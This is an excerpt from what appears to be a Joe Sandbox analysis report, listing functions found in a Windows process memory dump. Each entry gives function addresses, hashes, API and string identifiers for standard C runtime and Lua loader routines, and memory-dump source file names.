                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _free_nolock
                                                      • String ID: luaJIT_BC_%s$luaopen_%s$path too long
                                                      • API String ID: 2882679554-1241789697
                                                      • Opcode ID: 5dea574ca3d95739399a95e25b92153f106047c46926396060786645f98203ee
                                                      • Instruction ID: 7de88efb2a76228b26e377e69af7a578a6629c3c3ec119783cbcdfb5942932f8
                                                      • Opcode Fuzzy Hash: 5dea574ca3d95739399a95e25b92153f106047c46926396060786645f98203ee
                                                      • Instruction Fuzzy Hash: F651203AA5CA85D1F760BB15E44336AA7A1F7C47D0F904572EA8E43BA9CF3CD4409B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF419F0 Relevance: 6.2, APIs: 4, Instructions: 159COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo$_get_daylight
                                                      • String ID:
                                                      • API String ID: 72036449-0
                                                      • Opcode ID: adda994bb8bdfca9ec35d26023c30ea6024999a432b5678b7d18df69566630e3
                                                      • Instruction ID: f3246e3a1b4d204602f52103b824675f55c982086eb477dec39175048e88cb1f
                                                      • Opcode Fuzzy Hash: adda994bb8bdfca9ec35d26023c30ea6024999a432b5678b7d18df69566630e3
                                                      • Instruction Fuzzy Hash: CD51F13AE0C72762F778792A8407B79E781DB00714F9941B5DA0D462C5EE3DE840B279
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AE719C0 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: Context$CaptureEntryFunctionLookupRestoreUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 3461063567-0
                                                      • Opcode ID: b1f1ff61777923e7652156cc2d336024070dc023beb6a1960c7b554b607fa398
                                                      • Instruction ID: 85f04bae8a038d355eaa41e86d956b506cc2540f59ecbe20b7c81e0a92a6d7f8
                                                      • Opcode Fuzzy Hash: b1f1ff61777923e7652156cc2d336024070dc023beb6a1960c7b554b607fa398
                                                      • Instruction Fuzzy Hash: 9B31183A918BC191EB60EB10E4463ABB3A1FBC9780F900176E68D43B68DF7DD154DB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF408C0 Relevance: 6.1, APIs: 4, Instructions: 53synchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
                                                      • String ID:
                                                      • API String ID: 2321548817-0
                                                      • Opcode ID: 82bfb5b300ae42bcdd7f9df15edbfe6164371cee34962632e7edd6329cc57e45
                                                      • Instruction ID: dc8acfc7b93297590b949bfa5e8a4138dc8bd74e9aac2067b7b83f3fef4054c1
                                                      • Opcode Fuzzy Hash: 82bfb5b300ae42bcdd7f9df15edbfe6164371cee34962632e7edd6329cc57e45
                                                      • Instruction Fuzzy Hash: 3F11B479A0C693A3FA507F25940263DE3A0AF45BA0F9842B0D92D47BC4DF3CE941A720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF14C2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 153COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-3916222277
                                                      • Opcode ID: f63cfcab38654406720fb298faccf2206334f1ee504fa2844d0f42e958091265
                                                      • Instruction ID: 47fdff25ed7363630d140393206f334e72de6cd908cbb66bc63031d73a7dd84a
                                                      • Opcode Fuzzy Hash: f63cfcab38654406720fb298faccf2206334f1ee504fa2844d0f42e958091265
                                                      • Instruction Fuzzy Hash: AA61C6BA908A1396FB78AF24C05737CB7A1FBA1B0AF9415B5C60A421D5CF2DD442E724
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF15308 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-3916222277
                                                      • Opcode ID: 0644313d939e58621442b79405c350c91277a9df8c69c39d18cf3d825145f917
                                                      • Instruction ID: 6847fd58453edf3d859b97b51b1d9eda4d512e76d17ad2cb0692e781e5334a5c
                                                      • Opcode Fuzzy Hash: 0644313d939e58621442b79405c350c91277a9df8c69c39d18cf3d825145f917
                                                      • Instruction Fuzzy Hash: C861C67AA5D21396F774AF28806603CB7A5FB15B09FE411B5C60E46398CF3DE441EB20
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF150F4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-3916222277
                                                      • Opcode ID: c220197af0a98cbd73017d0ba252ed5d07ee06621c5253f39b4124477447de71
                                                      • Instruction ID: 78fd7d1dade4a143b7145e99e869c44e7fcc628aef217a1de9e7aef53a6d3138
                                                      • Opcode Fuzzy Hash: c220197af0a98cbd73017d0ba252ed5d07ee06621c5253f39b4124477447de71
                                                      • Instruction Fuzzy Hash: 3961A87B91C283A6F7A4AF24C04637CB7A1FB15B18F9411B5CA0A563D5CF2CE485E721
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF157B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-3916222277
                                                      • Opcode ID: b2dd0ee893780d50b4674af438db78039d6ef4c60853aa3ea8af484d06fe7f99
                                                      • Instruction ID: 83d9ec1244c49d5193f5b06abf1fd46d510009d4ac4b6ee4be2dd8c86b3e25c7
                                                      • Opcode Fuzzy Hash: b2dd0ee893780d50b4674af438db78039d6ef4c60853aa3ea8af484d06fe7f99
                                                      • Instruction Fuzzy Hash: F551967A90820396F764AF28C04637CB7A5FB05B28FD411B5C64A523D5EF3CD485EB22
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF3B120 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: e+000$gfff
                                                      • API String ID: 3215553584-3030954782
                                                      • Opcode ID: 8e8504798e3096c9a346657a07f11e9947318bd45ce01f9eb4292907c059508d
                                                      • Instruction ID: bdc263c37b5b5dee60ed4faa6ce620aff2f8b45c8a7361380aa3814f160d431e
                                                      • Opcode Fuzzy Hash: 8e8504798e3096c9a346657a07f11e9947318bd45ce01f9eb4292907c059508d
                                                      • Instruction Fuzzy Hash: E9515766F186C756F761AF25985236DEB91EB80B90F88C3B1CBA847AD5CE2DD044C710
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF30BD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _handle_error
                                                      • String ID: !$fmod
                                                      • API String ID: 1757819995-3213614193
                                                      • Opcode ID: f0718bf514110123fd14397416006eaade00b89320632af20748014d40c22490
                                                      • Instruction ID: 35910f7572334e80584857342f343944399299ee53b98a9d56908bbaf46fc20a
                                                      • Opcode Fuzzy Hash: f0718bf514110123fd14397416006eaade00b89320632af20748014d40c22490
                                                      • Instruction Fuzzy Hash: FE512755D2DB879AF6237731A0037B5EA98AFA23C0F809373E94A315E1DF1EE1436210
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AEE8050 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: std::rsfun
                                                      • String ID: $$type parameter
                                                      • API String ID: 3764944385-1705267328
                                                      • Opcode ID: 6b1de1a4cd9c0b01c76d9f2ae974172aeab0731a05d1d1179e6173c14350cda6
                                                      • Instruction ID: 32e6dd4d6070b71f849d548faabcc6e9e851ad93816876970018e2c4f1df930c
                                                      • Opcode Fuzzy Hash: 6b1de1a4cd9c0b01c76d9f2ae974172aeab0731a05d1d1179e6173c14350cda6
                                                      • Instruction Fuzzy Hash: 51514136618B4586EB60DB4AE49122EF7A0F7C8BA4F544632EE9D877A4CF7CD440DB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF3CB88 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastWrite
                                                      • String ID: U
                                                      • API String ID: 442123175-4171548499
                                                      • Opcode ID: bb5670a805d3fe430e447df02031e4798067a628be05abd275a1d0ed77e9e78f
                                                      • Instruction ID: ca847dc04857137a3a0b849615385bac7701d56af47e405f951ab2b62f1890e3
                                                      • Opcode Fuzzy Hash: bb5670a805d3fe430e447df02031e4798067a628be05abd275a1d0ed77e9e78f
                                                      • Instruction Fuzzy Hash: DF41C536B18A8295EB20EF25E4453AAB7A0FB887D4F804131EE8D87798DF3DD546D710
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF3EE00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _handle_error
                                                      • String ID: "$pow
                                                      • API String ID: 1757819995-713443511
                                                      • Opcode ID: a0dc12af340543ad661d9082fe21a51273c15c51973181b3e1556972bb2ad2fd
                                                      • Instruction ID: eb31e06680bd6972d7da5d201b85ff6a98193f5af224d4503b7ae0d3bf23e597
                                                      • Opcode Fuzzy Hash: a0dc12af340543ad661d9082fe21a51273c15c51973181b3e1556972bb2ad2fd
                                                      • Instruction Fuzzy Hash: 45215E76D1CAC697E370DF10E44166AFAE0FFDA348F601325F68906994CBBED185AB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF402B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _set_errno_from_matherr
                                                      • String ID: tanh
                                                      • API String ID: 1187470696-874243715
                                                      • Opcode ID: 0a0cb5a22677a767c1ff2a638b69de59b972d8315788a6de307129cec1c6edf7
                                                      • Instruction ID: d53b6621f5f69a8cc6fcaadb8800d47425de837621bccf24cf605f5f56a5dbe8
                                                      • Opcode Fuzzy Hash: 0a0cb5a22677a767c1ff2a638b69de59b972d8315788a6de307129cec1c6edf7
                                                      • Instruction Fuzzy Hash: 1221303AA18686DBE760EF28E54166AB7E0FB88740F904535F68D82B96DF3CD5009F10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF395DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: CompareStringtry_get_function
                                                      • String ID: CompareStringEx
                                                      • API String ID: 3328479835-2590796910
                                                      • Opcode ID: 7c137282e7c86aa6c0bf46448e78d5a8f7a91d59841db637c6b4b72db4fd0273
                                                      • Instruction ID: 7b5707223a2b44039559be908232429b03bcd41495d2562c06f66df4410f15d8
                                                      • Opcode Fuzzy Hash: 7c137282e7c86aa6c0bf46448e78d5a8f7a91d59841db637c6b4b72db4fd0273
                                                      • Instruction Fuzzy Hash: 12115E75A0CB8196E760DB16F4812AAB7A0F7C8BC0F444136EE8D83B59CF3CD5408B40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF3987C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: DateFormattry_get_function
                                                      • String ID: GetDateFormatEx
                                                      • API String ID: 595753042-159735388
                                                      • Opcode ID: af7e7c8f2fce8e6a76a9e8277ac3568be614c2fd3a1d6e1be1d9561cf776209e
                                                      • Instruction ID: 9379250e57143e8419b76260d36ec5e1563ba1b0dfc4824283055f15222a06da
                                                      • Opcode Fuzzy Hash: af7e7c8f2fce8e6a76a9e8277ac3568be614c2fd3a1d6e1be1d9561cf776209e
                                                      • Instruction Fuzzy Hash: 43115175E0878296E710EB55B44109AB7A0FB88BC0F544176EE8D43B58CF3CD6158B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF399B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44timeCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: FormatTimetry_get_function
                                                      • String ID: GetTimeFormatEx
                                                      • API String ID: 3261793192-1692793031
                                                      • Opcode ID: 47381a618a14b10dcba3f011165832e410438ae4806938e3760848f053d032c4
                                                      • Instruction ID: 8e8183d7f58beebb246b3bf956f7cca12da5dff8c8fe2d4da0e72330a21e265a
                                                      • Opcode Fuzzy Hash: 47381a618a14b10dcba3f011165832e410438ae4806938e3760848f053d032c4
